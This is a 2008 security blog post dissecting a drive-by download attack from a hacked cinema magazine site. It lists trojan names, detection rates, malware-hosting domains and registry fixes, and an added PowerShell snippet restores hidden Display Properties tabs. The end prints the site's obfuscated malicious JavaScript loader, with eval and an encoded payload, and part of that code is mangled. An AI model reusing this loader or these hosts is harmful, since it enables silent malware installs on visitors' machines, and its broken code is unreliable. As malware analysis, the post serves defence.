Jul 11, 2008

3 mins of innocent browsing on the Wild Wild Web

Focus of the post: drive-by downloads delivered through malicious JavaScript and iframe tags.


The hacked page of cinema-systemsindia.com, self-proclaimed India's leading cinemagazine, leads to a couple of silent trojan downloads. At the time of writing, the trojans aren't detected by any of the major antivirus firms except NOD32 (scan). AVG AV with its Link Scanner completely fails here. Internet Explorer users get completely owned, but Google and Firefox 3 users are warned about the malicious content on the page.

Using an updated antivirus system isn't a sufficient solution for a Windows desktop system. The most surprising thing is that all the trojans downloaded from the hacked URL were not detected by any of the major AVs (scan1). The inbuilt heuristic scanning is pretty useless.
Malware stats (detections/engines, Kaspersky name where one exists):
havp2d.exe - 3/30 (-)
tpzhzx.exe - 7/33 (-)
svchddd.ex - 10/33 (Trojan-Spy.Win32.Zbot.dag)
file.bat - 5/33 (Trojan-Proxy.Win32.Small.mu)
lphcp1uj0egl5.exe - 8/33 (-)
scchost.exe - 16/33 (Trojan-Proxy.Win32.Small.sl)
index.exe - 11/33 (-)
blphct1lj0ec4c.scr - 6/33 (-)
phcp1uj0egl5.bmp - 3/33 (-)
winlogon.exe - 5/33 (Trojan-Proxy.Win32.Small.st)

Charitable IPs (Kaspersky names):
87.118.117.138/ho.php (Trojan-Downloader.JS.Iframe)
neiron2009.com/check/vers155.php?q=1 (Trojan-Downloader.Win32.Winlagons.vb)

Google and Firefox 3 prevented the malicious loading of the URL.
The Google Diagnostic page stats for cinema-systemsindia.com: "What happened when Google visited this site? Of the 33 pages we tested on the site over the past 90 days, 11 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 07/08/2008, and the last time suspicious content was found on this site was on 06/06/2008. Malicious software includes 12 trojan(s). Successful infection resulted in an average of 7 new processes on the target machine. Malicious software is hosted on 3 domain(s), including sum4count.net, 78.109.30.0, try-count.net. 1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including gate4clicks.net."

Spyware Wallpaper - The malware hides the Desktop (wallpaper) tab in Display Properties to prevent you from changing the wallpaper. To bring it back, make the following change in the registry:


REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] 
"NoDispBackgroundPage"=dword:00000000

Fake Sysinternals Screensaver

A modified fake Sysinternals Blue Screen of Death screensaver with a progress bar is installed by the malware. To prevent you from changing the screensaver, the malware hides the Screen Saver tab in Display Properties. Make the following registry change:
REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] 
"NoDispScrSavPage"=dword:00000000
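The two .reg fragments above reset the values one at a time. As an added example (not from the original post), this PowerShell snippet checks both policy values the malware sets, reports which Display Properties tabs are currently hidden, and restores them; the key path and value names are the ones quoted in the post, and it must run as the affected user since the key lives under HKCU.

```powershell
# Added example, not the post's own code: audit and undo the Display Properties
# policy values the post describes. Assumes the HKCU key and the two value names
# quoted in the post's .reg fragments.
$key    = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\System'
$values = 'NoDispBackgroundPage', 'NoDispScrSavPage'

function Get-HiddenDisplayTabs {
    # Returns the policy value names that are present and non-zero,
    # i.e. the tabs that are currently hidden from the user.
    if (-not (Test-Path $key)) { return @() }
    $props = Get-ItemProperty -Path $key
    $values | Where-Object { $null -ne $props.$_ -and $props.$_ -ne 0 }
}

function Restore-DisplayTabs {
    # Same effect as the post's .reg files: set each hidden-tab value back to 0.
    foreach ($name in Get-HiddenDisplayTabs) {
        $old = (Get-ItemProperty -Path $key).$name
        Write-Host "Resetting $key\$name (was $old)"
        Set-ItemProperty -Path $key -Name $name -Value 0 -Type DWord
    }
}

$hidden = @(Get-HiddenDisplayTabs)
if ($hidden.Count -eq 0) {
    Write-Host 'No Display Properties tabs are hidden by policy.'
} else {
    Write-Host "Hidden by policy: $($hidden -join ', ')"
    Restore-DisplayTabs
}
```

Setting the values to 0 mirrors the post's fix; deleting them with Remove-ItemProperty is equivalent, but either way this only restores the tabs and does not remove the trojans that set them.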

Malicious obfuscated JavaScript; the complete dissection of the URL is here

function tdoban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,18,23,53,49,39,44,25,33,54,0,0,0,0,
0,0,9,2,46,21,56,42,26,48,35,6,1,17,16,24,30,58,3,4,43,12,51,61,27,37,14,29,32,0,0,0,0,38,0,8,5,20,60,47,28,52,7,45,19,2
2,31,55,36,10,15,41,13,11,50,59,62,34,57,40,0);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--)
{{w|=(t[x.charCodeAt(p++)-48])<>=8;s-=2}else{s=6}}}eval(r);
}}tdoban('bB@5k978fhy8jFD8Jvf399@52kYtk97nhvxWfFambAD_INq9Cud_cADnlNqgfXx52vfGIV@G2oYZzIxTLRq8IoatYmYWjFDWIhq5VI7_Jtr52F
MmI9YTC5UejFy_fPM5htqWF0unIE@mzX@5k9x5Fer9IjS4Qed972YGIV@G2kY9CPigbBqWIExTIpfG1RxWVkq_IvdGPh6gJFDwNNxTLVx_Joy5jBatf9@52A
rTXmU_cADnlN@TCer') 

